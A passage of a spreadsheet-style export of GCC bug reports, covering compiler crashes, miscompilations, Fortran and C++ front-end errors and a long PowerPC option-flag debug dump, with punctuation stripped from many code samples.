/var/tmp/portage/sys-devel/gcc-4.3.98/work/build/./gcc/include/gentoo-multilib/amd64/sys/sysmacros.h:75: error: expected '=' '' '' 'asm' or '__attribute__' before 'extern'
/var/tmp/portage/sys-devel/gcc-4.3.98/work/build/./gcc/include/gentoo-multilib/amd64/sys/sysmacros.h:85: error: expected '=' '' '' 'asm' or '__attribute__' before 'extern'
In file included from /usr/include/sys/sysmacros.h:8</t>
  </si>
  <si>
    <t>ron3763</t>
  </si>
  <si>
    <t>GCC-83891</t>
  </si>
  <si>
    <t>std::filesystem::path::is_absolute for Windows</t>
  </si>
  <si>
    <t>Current is_absolute implementation is follow:
inline bool
path::is_absolute() const
{
#ifdef _GLIBCXX_FILESYSTEM_IS_WINDOWS
  return has_root_name()
#else
  return has_root_directory()
#endif
}
This means path(C:).is_absolute() == true. However Windows GetFullPathName() API says:
&gt; If you specify U: the path returned is the current directory on the U:\ drive
https://msdn.microsoft.com/en-us/library/windows/desktop/aa364963(v=vs.85).aspx
I think path(C:).is_absolute() should return false.
As additional information libc++/msvc experimental implementation returns false.</t>
  </si>
  <si>
    <t>GCC-14765</t>
  </si>
  <si>
    <t>[3.3 Regression] ice-on-invalid-code ICE while compiling ({}) expression</t>
  </si>
  <si>
    <t>$ cat bug2.i
int a
void fun ()
{
	a = 0
	a = ({})
}
$ gcc-3.3 bug2.i
bug2.i: In function `fun':
bug2.i:5: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ gcc-3.5-tree-ssa bug2.i
bug2.i: In function `fun':
bug2.i:5: warning: statement-expressions should end with a non-void expression
gimplification failed:
 &lt;statement_list 0x4051f630
    type &lt;void_type 0x40461984 void VOID
        align 8 symtab 0 alias set -1
        pointer_to_this &gt;
   &gt;
bug2.i:5: internal compiler error: in gimplify_expr at gimplify.c:3496
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-61273</t>
  </si>
  <si>
    <t>gccgo: ICE in Unsafe_type_conversion_expression::do_get_backend [GoSmith]</t>
  </si>
  <si>
    <t>gccgo (GCC) 4.10.0 20140516 (experimental)
The program is:
package main
func main() {
	c := make(chan bool 1)
	for  false c &lt;- false {
	}
}
$ go build -compiler=gccgo src.go 
src.go:6:1: error: expected '{'
 }
 ^
src.go:4:8: error: expected type
  for  false c &lt;- false {
        ^
go1: internal compiler error: in do_get_backend at go/gofrontend/expressions.cc:3532
0x5a21eb Unsafe_type_conversion_expression::do_get_backend(Translate_context*)
	../../gcc/go/gofrontend/expressions.cc:3527
0x5bb6eb Call_expression::do_get_backend(Translate_context*)
	../../gcc/go/gofrontend/expressions.cc:9425
0x60a1d8 Send_statement::do_get_backend(Translate_context*)
	../../gcc/go/gofrontend/statements.cc:4513
0x5db097 Block::get_backend(Translate_context*)
	../../gcc/go/gofrontend/gogo.cc:5454
0x60741c Block_statement::do_get_backend(Translate_context*)
	../../gcc/go/gofrontend/statements.cc:1811
0x5db097 Block::get_backend(Translate_context*)
	../../gcc/go/gofrontend/gogo.cc:5454
0x60741c Block_statement::do_get_backend(Translate_context*)
	../../gcc/go/gofrontend/statements.cc:1811
0x5db097 Block::get_backend(Translate_context*)
	../../gcc/go/gofrontend/gogo.cc:5454
0x60741c Block_statement::do_get_backend(Translate_context*)
	../../gcc/go/gofrontend/statements.cc:1811
0x5db097 Block::get_backend(Translate_context*)
	../../gcc/go/gofrontend/gogo.cc:5454
0x5dc925 Function::build(Gogo* Named_object*)
	../../gcc/go/gofrontend/gogo.cc:5062
0x5ddc57 Named_object::get_backend(Gogo* std::vector &gt;&amp; std::vector &gt;&amp; std::vector &gt;&amp;)
	../../gcc/go/gofrontend/gogo.cc:6753
0x5e2b5c Gogo::write_globals()
	../../gcc/go/gofrontend/gogo.cc:1136
gc successfully compiles the code.</t>
  </si>
  <si>
    <t>GCC-82168</t>
  </si>
  <si>
    <t>Parameterized Derived Types problems with default type parameters</t>
  </si>
  <si>
    <t>The following code is rejected by gcc-8. According to page 258 of modern fortran explained default type parameters are allowed. Therefore I assume the following    code bug2.f90 ist legal.
cat bug2.f90
module mod
implicit none
integer parameter :: dp = kind (0.0d0)
type public :: v(z k)
   integer len :: z
   integer kind :: k = kind(0.0)
   real(kind = k) :: e(z)
end type v
end module mod
program bug
use mod
implicit none
type (v(2)) :: a
type (v(z=: k=dp)) allocatable :: b
end program bug
LANG=C gfortran-8 -v -W -Wall bug2.f90
Driving: gfortran-8 -v -W -Wall bug2.f90 -mmacosx-version-min=10.11.6 -asm_macosx_version_min=10.11 -l gfortran -shared-libgcc
Using built-in specs.
COLLECT_GCC=gfortran-8
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/x86_64-apple-darwin15.6.0/8.0.0/lto-wrapper
Target: x86_64-apple-darwin15.6.0
Configured with: ../gcc/configure --enable-languages=cc++fortranlto --with-gmp=/sw --with-libiconv-prefix=/sw --with-isl=/sw --with-mpc=/sw --with-system-zlib --program-suffix=-8
Thread model: posix
gcc version 8.0.0 20170910 (experimental) [trunk revision 251945] (GCC) 
COLLECT_GCC_OPTIONS='-v' '-Wextra' '-Wall' '-mmacosx-version-min=10.11.6' '-asm_macosx_version_min=10.11' '-shared-libgcc' '-mtune=core2'
 /usr/local/libexec/gcc/x86_64-apple-darwin15.6.0/8.0.0/f951 bug2.f90 -fPIC -quiet -dumpbase bug2.f90 -mmacosx-version-min=10.11.6 -mtune=core2 -auxbase bug2 -Wextra -Wall -version -fintrinsic-modules-path /usr/local/lib/gcc/x86_64-apple-darwin15.6.0/8.0.0/finclude -o /var/folders/97/4qnhjhtn25s86s9hkz0h37_m0000gn/T//cc0hzKu0.s
GNU Fortran (GCC) version 8.0.0 20170910 (experimental) [trunk revision 251945] (x86_64-apple-darwin15.6.0)
	compiled by GNU C version 8.0.0 20170910 (experimental) [trunk revision 251945] GMP version 6.1.2 MPFR version 3.1.5 MPC version 1.0.3 isl version isl-0.16.1-GMP
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU Fortran2008 (GCC) version 8.0.0 20170910 (experimental) [trunk revision 251945] (x86_64-apple-darwin15.6.0)
	compiled by GNU C version 8.0.0 20170910 (experimental) [trunk revision 251945] GMP version 6.1.2 MPFR version 3.1.5 MPC version 1.0.3 isl version isl-0.16.1-GMP
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
bug2.f90:18:11:
 type (v(2)) :: a
           1
Error: The value for the KIND parameter ''k'' at (1) does not reduce to a constant expression
bug2.f90:19:9:
 type (v(z=: k=dp)) allocatable :: b
         1
Error: Syntax error in argument list at (1)</t>
  </si>
  <si>
    <t>physiker</t>
  </si>
  <si>
    <t>GCC-33710</t>
  </si>
  <si>
    <t>typo on development plan page.</t>
  </si>
  <si>
    <t>Is '4.2.1' a mistake of '4.2.2' ?
http://gcc.gnu.org/cgi-bin/cvsweb.cgi/wwwdocs/htdocs/develop.html.diff?r1=1.81&amp;r2=1.82
==========================
       v                                     v
  GCC 4.3 Stage 2                          GCC 4.2.1 release (Jul 18 2007)
       |                                      \
       v                                       v
  GCC 4.3 Stage 3                          GCC 4.2.1 release (Oct 7 2007)
       |                                       ^^^^^
       :
       v
============================</t>
  </si>
  <si>
    <t>nakamura</t>
  </si>
  <si>
    <t>GCC-54607</t>
  </si>
  <si>
    <t>[avr]: Canadian cross build fails because gen-avr-mmcu-texi.c is compiled with the wrong compiler</t>
  </si>
  <si>
    <t>./gcc/config/avr/gen-avr-mmcu-texi.c must be compiled with the native build-&gt;build compiler not with the build-&gt;host cross compiler.</t>
  </si>
  <si>
    <t>GCC-38248</t>
  </si>
  <si>
    <t>Ignored temporary module files manipulation errors</t>
  </si>
  <si>
    <t>Minimal testcase to `use' some module cannot be compiled.
Compilation works fine on Fedora gcc-gfortran-4.3.2-7.x86_64.
GNU Fortran (GCC) version 4.4.0 20081124 (experimental) (x86_64-unknown-linux-gnu)
	compiled by GNU C version 4.4.0 20081124 (experimental) GMP version 4.2.2 MPFR version 2.3.2.
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
$ gcc-build/gcc/f951 -o gccmod.s gccmod.f90 -Wall -ggdb2
 initFatal Error: Reading module mmm at line 16 column 65: Expected left parenthesis
$ cat gccmod.f90
module mmm
contains
 subroutine init
 end subroutine init
end module mmm
program main
 use mmm
end program main
$ _
(In fact no `module mmm' part needs to be present there.)</t>
  </si>
  <si>
    <t>GCC-26242</t>
  </si>
  <si>
    <t>[4.1/4.2 Regression] VRP is not documented in passes.texi</t>
  </si>
  <si>
    <t>Again another missing documention in passes.texi.</t>
  </si>
  <si>
    <t>GCC-45650</t>
  </si>
  <si>
    <t>[4.4/4.5/4.6 regression] FreeBSD/ia64 builds fails: hidden symbol `_Unwind_FindTableEntry' isn't defined</t>
  </si>
  <si>
    <t>It turns out that bug #40959 actually is only one of two regressions
that breaks bootstrap on FreeBSD/ia64.  This is the other case.
Since 
        2004-11-09  H.J. Lu  
        PR target/18380
        * config/ia64/unwind-ia64.h (_Unwind_FindTableEntry): Mark it
        hidden.
        * unwind-dw2.c (_Unwind_FindTableEntry): Removed.
_Unwind_FindTableEntry has been marked hidden which is okay for those
cases where GCC defines the function but breaks FreeBSD which has this
in libc.</t>
  </si>
  <si>
    <t>GCC-81365</t>
  </si>
  <si>
    <t>[7/8 Regression] GCC miscompiles swap</t>
  </si>
  <si>
    <t>Created attachment 41700
Minimal test case
For the attached code gcc miscompiles the call to swap in Foo::swapToHead()
with the result that the value of 'a' is lost.
gcc-7.1 miscompiles the code at -O2 and above (-O1 and above if std::swap is used) at least with x86_64-pc-linux-gnu.
gcc-6.3 compiles the code correctly.
### Relevant sequence of instructions:
mov    edxedx
lea    rcx[rdi+0x8]                    tail[0]
mov    DWORD PTR [rdi+rdx*4+0x10]esi   store to head_[1] - This does not seem to be right
mov    eaxDWORD PTR [rdi+rdx*4+0x10]
mov    DWORD PTR [rcx]eax              now head_[1] and tail[0] are the same
### COMMAND:
g++ -O3  bug-min.ii
./a.out
### EXPECTED OUTPUT:
(rc=0)
### ACTUAL OUTPUT:
x.swapToHead(Lit::make( 2) 1) &amp;&amp; Lit 2 went missing
Aborted
### g++ -v
Using built-in specs.
COLLECT_GCC=/home/wv/bin/linux/64/gcc-7.1/bin/g++
COLLECT_LTO_WRAPPER=/home/wv/bin/linux/64/gcc-7.1/libexec/gcc/x86_64-pc-linux-gnu/7.1.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../../sources/gcc-7.1.0/configure --prefix=/home/wv/bin/linux/64/gcc-7.1 --enable-languages=cc++
Thread model: posix
gcc version 7.1.0 (GCC)</t>
  </si>
  <si>
    <t>kaufmann</t>
  </si>
  <si>
    <t>GCC-2659</t>
  </si>
  <si>
    <t>bad_cast exception not thrown</t>
  </si>
  <si>
    <t>g++ does not throw a bad_cast exception when a base-class pointer is
dynamically cast to a derived-class pointer which of course is illegal.
It does however return a NULL pointer which was the old style error
condition detection.
Release:
3.0 20010409 (prerelease)
Environment:
System: Linux tosca 2.2.18 #2 Thu Mar 8 13:48:25 PST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --prefix=/usr/local/gcc --disable-nls
How-To-Repeat:
Compile this program with g++ bad_cast.cpp and run it.
Gives a Segmentation fault.
Source code below:
/**********************************************************************
  Filename:  bad_cast.cpp
  Chapter:   9      Exceptions
  Compiler:  Borland C++     Version 5.01      Summer 1998
  C++ for C Programmers Edition 3     By Ira Pohl
********************************************************************/
#include 
#include 
#include 
using namespace std
class A {
public:
  virtual void foo() { cout &lt;&lt; in A &lt;&lt; endl }
}
class B: public A {
public:
  void foo() { cout &lt;&lt; in B &lt;&lt; endl }
}
int main()
{
   try {
      A a *pa B b *pb
      pa = 
      pb = dynamic_cast(pa)      //succeeds
      pb -&gt; foo()
      pa = 
      pb = dynamic_cast(pa)      //fails
      // if (pb==NULL) {bad_cast x throw x } // my g++ does not throw it
      pb -&gt; foo()
   }
   catch(bad_cast) { cout &lt;&lt; dynamic_cast failed &lt;&lt; endl }
}</t>
  </si>
  <si>
    <t>mayer</t>
  </si>
  <si>
    <t>GCC-1363</t>
  </si>
  <si>
    <t>libjgcj make fails on natPlainDatagramSocketImpl.cc</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;feedback
State-Changed-Why: Do you have any way to try this with a later release of
    gcj?  2.95.2 is rather old unfortunately.
    It is possible that this problem is fixed in the cvs
    version of libgcj.  Or maybe it isn't.  I don't know
    because I'm not set up to use Cygwin.  We don't do
    Cygwin builds of libgcj on a regular basis.
    If you can try the cvs libgcj and it still fails
    could you perhaps do any debugging of it?  It might be
    as simple as adding the appropriate #ifdefs in parts of
    the code.  Basically any more data would be useful here --
    we'd like to fix this but don't really have the resources
    to do all the investigation right now.
</t>
  </si>
  <si>
    <t>shell</t>
  </si>
  <si>
    <t>GCC-54190</t>
  </si>
  <si>
    <t>TYPE(*)/assumed-rank: Type/rank check too relaxed for dummy procedure</t>
  </si>
  <si>
    <t>The following program is invalid and should print
  Error: Interface mismatch in dummy procedure 'x' at (1): Type/rank mismatch in argument 'x'
See interface.c's compare_type_rank and its callers.
However due to the TYPE(*) not error is printed. I suspect that for assumed-rank (dimension(..)) a similar issue exists but it could be already caught by the as.type checks.
Cf. http://gcc.gnu.org/ml/fortran/2012-08/msg00034.html
As extension the check could be split. Namely one should get a separate error for TYPE and for RANK the former should use gfc_typename() to print the types (and the kinds) the latter should also be printed. (Either deferring assumed-rank to a later check or specially handling the case rank==-1.)
! Example:
implicit none
contains
subroutine g(x)
  integer :: x
end subroutine g
subroutine f(x)
  type(*) :: x
end subroutine f
subroutine sub(x)
  procedure(g) :: x
end subroutine sub
subroutine test()
  call sub(f)  ! INVALID: f has an argument 'x' of TYPE(*) instead of integer
end subroutine test
end</t>
  </si>
  <si>
    <t>GCC-79657</t>
  </si>
  <si>
    <t>ICE on invalid c++ code in finish_underlying_type cp/semantics.c:3849</t>
  </si>
  <si>
    <t>Adopted from clang:
$ g++ /home/marxin/BIG/Programming/llvm-project/llvm/tools/clang/test/SemaCXX/underlying_type.cp
...
/home/marxin/BIG/Programming/llvm-project/llvm/tools/clang/test/SemaCXX/underlying_type.cpp:53:29: internal compiler error: Segmentation fault
     a = (__underlying_type(E)){}
                             ^
0x11cc42a crash_signal
	../../gcc/toplev.c:337
0x80d55e tree_class_check(tree_node* tree_code_class char const* int char const*)
	../../gcc/tree.h:3186
0xa5a5aa finish_underlying_type(tree_node*)
	../../gcc/cp/semantics.c:3849
0x996185 cp_parser_trait_expr
	../../gcc/cp/parser.c:9747
0x9a36d6 cp_parser_simple_type_specifier
	../../gcc/cp/parser.c:16753
0x9a304b cp_parser_type_specifier
	../../gcc/cp/parser.c:16519
0x9aba9b cp_parser_type_specifier_seq
	../../gcc/cp/parser.c:20804
0x9ab5cd cp_parser_type_id_1
	../../gcc/cp/parser.c:20647
0x9ab915 cp_parser_type_id
	../../gcc/cp/parser.c:20715
0x98fc43 cp_parser_postfix_expression
	../../gcc/cp/parser.c:6728
0x9935b1 cp_parser_unary_expression
	../../gcc/cp/parser.c:8125
0x9943e3 cp_parser_cast_expression
	../../gcc/cp/parser.c:8802
0x9944d3 cp_parser_binary_expression
	../../gcc/cp/parser.c:8903
0x9951ee cp_parser_assignment_expression
	../../gcc/cp/parser.c:9190
0x995949 cp_parser_constant_expression
	../../gcc/cp/parser.c:9460
0x9a6277 cp_parser_enumerator_definition
	../../gcc/cp/parser.c:18081
0x9a6133 cp_parser_enumerator_list
	../../gcc/cp/parser.c:18021
0x9a5ed0 cp_parser_enum_specifier
	../../gcc/cp/parser.c:17948
0x9a2e5b cp_parser_type_specifier
	../../gcc/cp/parser.c:16413
0x99dd17 cp_parser_decl_specifier_seq
	../../gcc/cp/parser.c:13352</t>
  </si>
  <si>
    <t>GCC-53968</t>
  </si>
  <si>
    <t>integer undefined behaviors in GCC</t>
  </si>
  <si>
    <t>Using IOC (link below) I made a GCC that looks for integer overflow problems in itself and then used it to run the GCC testsuite and bootstrap itself. The resulting defects are listed below.
I've found that the best way to track down these problems is to put an assertion into the source code close to where the overflow happens.
Note that this is far fewer undefined behaviors than were present two years ago:
  http://gcc.gnu.org/ml/gcc/2010-08/msg00039.html
Version info:
regehr@home:~/z/checked-gcc-install/bin$ ./gcc -v
Using built-in specs.
COLLECT_GCC=./gcc
COLLECT_LTO_WRAPPER=/home/regehr/z/checked-gcc-install/libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /home/regehr/z/compiler-source/gcc/configure --enable-languages=cc++ CC='clang -w -fcatch-undefined-behavior' CXX='clang++ -w -fcatch-undefined-behavior' --prefix=/home/regehr/z/checked-gcc-install --disable-bootstrap
Thread model: posix
gcc version 4.8.0 20120714 (experimental) (GCC) 
IOC tool:
http://embed.cs.utah.edu/ioc/
Defects:
ARITHMETIC UNDEFINED at  : Op: - Reason : Signed Subtraction Overflow BINARY OPERATION: left (int32): 2147483647 right (int32): -1 
ARITHMETIC UNDEFINED at  : Op: * Reason : Signed Multiplication Overflow BINARY OPERATION: left (int64): 4294967295 right (int64): 4294967295 
ARITHMETIC UNDEFINED at  : Op: &lt;&lt; Reason : Unsigned Left Shift: Right operand is negative or is greater than or equal to the width of the promoted left operand BINARY OPERATION: left (uint64): 2 right (uint64): 4294967295 
ARITHMETIC UNDEFINED at  : Op: - Reason : Signed Subtraction Overflow UNARY OPERATION: left (int64): 0 right (int64): -9223372036854775808 
ARITHMETIC UNDEFINED at  : Op: * Reason : Signed Multiplication Overflow BINARY OPERATION: left (int32): 256348 right (int32): 10000 
ARITHMETIC UNDEFINED at  : Op: - Reason : Signed Subtraction Overflow UNARY OPERATION: left (int64): 0 right (int64): -9223372036854775808 
ARITHMETIC UNDEFINED at  : Op: - Reason : Signed Subtraction Overflow BINARY OPERATION: left (int64): -9223372036854775808 right (int64): 1 
ARITHMETIC UNDEFINED at  : Op: - Reason : Signed Subtraction Overflow BINARY OPERATION: left (int64): -9223372036854775808 right (int64): 1 
ARITHMETIC UNDEFINED at  : Op: - Reason : Signed Subtraction Overflow UNARY OPERATION: left (int64): 0 right (int64): -9223372036854775808 
ARITHMETIC UNDEFINED at  : Op: - Reason : Signed Subtraction Overflow BINARY OPERATION: left (int64): -9223372036854775808 right (int64): 1 
ARITHMETIC UNDEFINED at  : Op: - Reason : Signed Subtraction Overflow BINARY OPERATION: left (int64): -9223372036854775808 right (int64): 1</t>
  </si>
  <si>
    <t>GCC-71537</t>
  </si>
  <si>
    <t>GCC rejects consetxpr boolean conversions and comparisons on the result of pointer arithmetic.</t>
  </si>
  <si>
    <t>For example:
constexpr int n[42] = {1}
constexpr int x = n ? 1 : 0 // Accepted.
constexpr int xx = n + 1 ? 1 : 0 // Rejected
constexpr int xxx = abc + 1 ? 1 : 0 // Also Rejected
This has a significant impact on constexpr algorithms which operate over raw pointers since pointer comparisons are not considered constant expressions.
For example this bug breaks libc++'s implementation of string_view::find and renders the char_traits::find(...) interface useless since it returns a possibly null pointer.</t>
  </si>
  <si>
    <t>GCC-43912</t>
  </si>
  <si>
    <t>[C++0x] lambda debug info does not describe captured variables</t>
  </si>
  <si>
    <t>It would be nice for gdb users if any variables captured by a lambda
were described in the debuginfo for the inner function.
See http://sourceware.org/bugzilla/show_bug.cgi?id=11547</t>
  </si>
  <si>
    <t>GCC-13811</t>
  </si>
  <si>
    <t>[gfortran/tree-ssa] -fdump-tree-all causes ICE at  tree-inline.c:648</t>
  </si>
  <si>
    <t>% cat hello.f90
SUBROUTINE FOO11(A)
  CHARACTER*11 A
  A = HELLO WORLD
END SUBROUTINE FOO11
% gfortran -fdump-tree-all -c hello.f90
hello.f90: In function `foo11':
hello.f90:0: internal compiler error: in copy_body_r at tree-inline.c:648</t>
  </si>
  <si>
    <t>GCC-12037</t>
  </si>
  <si>
    <t>[3.4 Regression] Spurious statement has no effect in templates</t>
  </si>
  <si>
    <t>I was pretty sure someone (I?) had already reported this but I can't find it no more: 
--------------------------------- 
#include  
template  void f () { 
  std::cout &lt;&lt;     
} 
--------------------------------- 
With present mainline we get: 
deal.II/base&gt; ~/tmp/build-gcc/gcc-install/bin/c++ -W -Wall -c x.cc 
x.cc: In function `void f()': 
x.cc:4: warning: statement has no effect 
That's clearly bogus. I thought it might be related to PR 11964 and PR 11957 but these 
two are already closed whereas this still happens with last night's CVS. 
W.</t>
  </si>
  <si>
    <t>GCC-83415</t>
  </si>
  <si>
    <t>[8 Regression] ICE during gimplification of assignment to read-only vector</t>
  </si>
  <si>
    <t>Created attachment 42876
Program to reproduce the problem
The following command line:
  gcc -S -O3 -o gimplification-error.s gimplification-error.c
results in an ICE as shown in the capture of stderr below:
At top of rs6000_override_internal global_init: 1
TARGET_DEFAULT                  = 0x1f07e05c09613f: -maltivec -mcmpb -mcrypto -mdirect-move -mno-dlmzb \
                                                    -mefficient-unaligned-vsx -mno-float128 -mno-float128-type \
                                                    -mno-float128-hardware -mfprnd -mhard-dfp -mhtm -mno-isel \
                                                    -mmfcrf -mno-mfpgpr -mno-modulo -mno-mulhw -mno-multiple \
                                                    -mpopcntb -mpopcntd -mpower8-fusion -mno-power8-fusion-sign \
                                                    -mpower8-vector -mno-power9-dform-scalar \
                                                    -mno-power9-dform-vector -mno-power9-fusion -mno-power9-minmax \
                                                    -mno-power9-misc -mno-power9-vector -mpowerpc-gfxopt \
                                                    -mpowerpc-gpopt -mquad-memory -mquad-memory-atomic \
                                                    -mrecip-precision -mno-save-toc-indirect -mno-string \
                                                    -mno-toc-fusion -mupdate -mupper-regs-di -mupper-regs-df \
                                                    -mupper-regs-sf -mvsx -mvsx-small-integer -mno-vsx-timode -m64 \
                                                    -m32 -mno-eabi -mlittle -mbig -mno-relocatable \
                                                    -mno-strict-align -mno-soft-float -mno-string
x_rs6000_isa_flags              = 
rs6000_isa_flags_explicit       = 
rs6000_isa_flags                = 0x1f07e05c09613f: -maltivec -mcmpb -mcrypto -mdirect-move -mno-dlmzb \
                                                    -mefficient-unaligned-vsx -mno-float128 -mno-float128-type \
                                                    -mno-float128-hardware -mfprnd -mhard-dfp -mhtm -mno-isel \
                                                    -mmfcrf -mno-mfpgpr -mno-modulo -mno-mulhw -mno-multiple \
                                                    -mpopcntb -mpopcntd -mpower8-fusion -mno-power8-fusion-sign \
                                                    -mpower8-vector -mno-power9-dform-scalar \
                                                    -mno-power9-dform-vector -mno-power9-fusion -mno-power9-minmax \
                                                    -mno-power9-misc -mno-power9-vector -mpowerpc-gfxopt \
                                                    -mpowerpc-gpopt -mquad-memory -mquad-memory-atomic \
                                                    -mrecip-precision -mno-save-toc-indirect -mno-string \
                                                    -mno-toc-fusion -mupdate -mupper-regs-di -mupper-regs-df \
                                                    -mupper-regs-sf -mvsx -mvsx-small-integer -mno-vsx-timode -m64 \
                                                    -m32 -mno-eabi -mlittle -mbig -mno-relocatable \
                                                    -mno-strict-align -mno-soft-float -mno-string
set_masks is POWERPC_MASKS
set_masks                       = 0x3fa7ffdedffb7a: -maltivec -mcmpb -mcrypto -mdirect-move -mdlmzb \
                                                    -mefficient-unaligned-vsx -mfloat128 -mfloat128-type \
                                                    -mfloat128-hardware -mfprnd -mhard-dfp -mhtm -misel -mmfcrf \
                                                    -mmfpgpr -mmodulo -mmulhw -mno-multiple -mpopcntb -mpopcntd \
                                                    -mpower8-fusion -mno-power8-fusion-sign -mpower8-vector \
                                                    -mpower9-dform-scalar -mpower9-dform-vector -mpower9-fusion \
                                                    -mpower9-minmax -mpower9-misc -mpower9-vector -mpowerpc-gfxopt \
                                                    -mpowerpc-gpopt -mquad-memory -mquad-memory-atomic \
                                                    -mrecip-precision -mno-save-toc-indirect -mno-string \
                                                    -mtoc-fusion -mno-update -mupper-regs-di -mupper-regs-df \
                                                    -mupper-regs-sf -mvsx -mvsx-small-integer -mvsx-timode -mno-64 \
                                                    -m32 -mno-eabi -mno-little -mbig -mno-relocatable \
                                                    -mstrict-align -msoft-float -mno-string
Before adjusting set_masks
set_masks                       = 0x3fa7ffdedffb7a: -maltivec -mcmpb -mcrypto -mdirect-move -mdlmzb \
                                                    -mefficient-unaligned-vsx -mfloat128 -mfloat128-type \
                                                    -mfloat128-hardware -mfprnd -mhard-dfp -mhtm -misel -mmfcrf \
                                                    -mmfpgpr -mmodulo -mmulhw -mno-multiple -mpopcntb -mpopcntd \
                                                    -mpower8-fusion -mno-power8-fusion-sign -mpower8-vector \
                                                    -mpower9-dform-scalar -mpower9-dform-vector -mpower9-fusion \
                                                    -mpower9-minmax -mpower9-misc -mpower9-vector -mpowerpc-gfxopt \
                                                    -mpowerpc-gpopt -mquad-memory -mquad-memory-atomic \
                                                    -mrecip-precision -mno-save-toc-indirect -mno-string \
                                                    -mtoc-fusion -mno-update -mupper-regs-di -mupper-regs-df \
                                                    -mupper-regs-sf -mvsx -mvsx-small-integer -mvsx-timode -mno-64 \
                                                    -m32 -mno-eabi -mno-little -mbig -mno-relocatable \
                                                    -mstrict-align -msoft-float -mno-string
rs6000_isa_flags_explicit       = 
After taking care of set_masks:
set_masks                       = 0x3fa7ffdedffb7a: -maltivec -mcmpb -mcrypto -mdirect-move -mdlmzb \
                                                    -mefficient-unaligned-vsx -mfloat128 -mfloat128-type \
                                                    -mfloat128-hardware -mfprnd -mhard-dfp -mhtm -misel -mmfcrf \
                                                    -mmfpgpr -mmodulo -mmulhw -mno-multiple -mpopcntb -mpopcntd \
                                                    -mpower8-fusion -mno-power8-fusion-sign -mpower8-vector \
                                                    -mpower9-dform-scalar -mpower9-dform-vector -mpower9-fusion \
                                                    -mpower9-minmax -mpower9-misc -mpower9-vector -mpowerpc-gfxopt \
                                                    -mpowerpc-gpopt -mquad-memory -mquad-memory-atomic \
                                                    -mrecip-precision -mno-save-toc-indirect -mno-string \
                                                    -mtoc-fusion -mno-update -mupper-regs-di -mupper-regs-df \
                                                    -mupper-regs-sf -mvsx -mvsx-small-integer -mvsx-timode -mno-64 \
                                                    -m32 -mno-eabi -mno-little -mbig -mno-relocatable \
                                                    -mstrict-align -msoft-float -mno-string
Before checking have_cpu
rs6000_isa_flags                = 0x1f07e05c09613f: -maltivec -mcmpb -mcrypto -mdirect-move -mno-dlmzb \
                                                    -mefficient-unaligned-vsx -mno-float128 -mno-float128-type \
                                                    -mno-float128-hardware -mfprnd -mhard-dfp -mhtm -mno-isel \
                                                    -mmfcrf -mno-mfpgpr -mno-modulo -mno-mulhw -mno-multiple \
                                                    -mpopcntb -mpopcntd -mpower8-fusion -mno-power8-fusion-sign \
                                                    -mpower8-vector -mno-power9-dform-scalar \
                                                    -mno-power9-dform-vector -mno-power9-fusion -mno-power9-minmax \
                                                    -mno-power9-misc -mno-power9-vector -mpowerpc-gfxopt \
                                                    -mpowerpc-gpopt -mquad-memory -mquad-memory-atomic \
                                                    -mrecip-precision -mno-save-toc-indirect -mno-string \
                                                    -mno-toc-fusion -mupdate -mupper-regs-di -mupper-regs-df \
                                                    -mupper-regs-sf -mvsx -mvsx-small-integer -mno-vsx-timode -m64 \
                                                    -m32 -mno-eabi -mlittle -mbig -mno-relocatable \
                                                    -mno-strict-align -mno-soft-float -mno-string
Since we have_cpu we mask off set_masks bits
rs6000_isa_flags                = 0x000000000005: -mno-altivec -mno-cmpb -mno-crypto -mno-direct-move -mno-dlmzb \
                                                  -mno-efficient-unaligned-vsx -mno-float128 -mno-float128-type \
                                                  -mno-float128-hardware -mno-fprnd -mno-hard-dfp -mno-htm \
                                                  -mno-isel -mno-mfcrf -mno-mfpgpr -mno-modulo -mno-mulhw \
                                                  -mno-multiple -mno-popcntb -mno-popcntd -mno-power8-fusion \
                                                  -mno-power8-fusion-sign -mno-power8-vector \
                                                  -mno-power9-dform-scalar -mno-power9-dform-vector \
                                                  -mno-power9-fusion -mno-power9-minmax -mno-power9-misc \
                                                  -mno-power9-vector -mno-powerpc-gfxopt -mno-powerpc-gpopt \
                                                  -mno-quad-memory -mno-quad-memory-atomic -mno-recip-precision \
                                                  -mno-save-toc-indirect -mno-string -mno-toc-fusion -mupdate \
                                                  -mno-upper-regs-di -mno-upper-regs-df -mno-upper-regs-sf -mno-vsx \
                                                  -mno-vsx-small-integer -mno-vsx-timode -m64 -m32 -mno-eabi \
                                                  -mlittle -mbig -mno-relocatable -mno-strict-align \
                                                  -mno-soft-float -mno-string
After setting flags to [cpu_index].target_enable
rs6000_isa_flags                = 0x1f07e05c09613f: -maltivec -mcmpb -mcrypto -mdirect-move -mno-dlmzb \
                                                    -mefficient-unaligned-vsx -mno-float128 -mno-float128-type \
                                                    -mno-float128-hardware -mfprnd -mhard-dfp -mhtm -mno-isel \
                                                    -mmfcrf -mno-mfpgpr -mno-modulo -mno-mulhw -mno-multiple \
                                                    -mpopcntb -mpopcntd -mpower8-fusion -mno-power8-fusion-sign \
                                                    -mpower8-vector -mno-power9-dform-scalar \
                                                    -mno-power9-dform-vector -mno-power9-fusion -mno-power9-minmax \
                                                    -mno-power9-misc -mno-power9-vector -mpowerpc-gfxopt \
                                                    -mpowerpc-gpopt -mquad-memory -mquad-memory-atomic \
                                                    -mrecip-precision -mno-save-toc-indirect -mno-string \
                                                    -mno-toc-fusion -mupdate -mupper-regs-di -mupper-regs-df \
                                                    -mupper-regs-sf -mvsx -mvsx-small-integer -mno-vsx-timode -m64 \
                                                    -m32 -mno-eabi -mlittle -mbig -mno-relocatable \
                                                    -mno-strict-align -mno-soft-float -mno-string
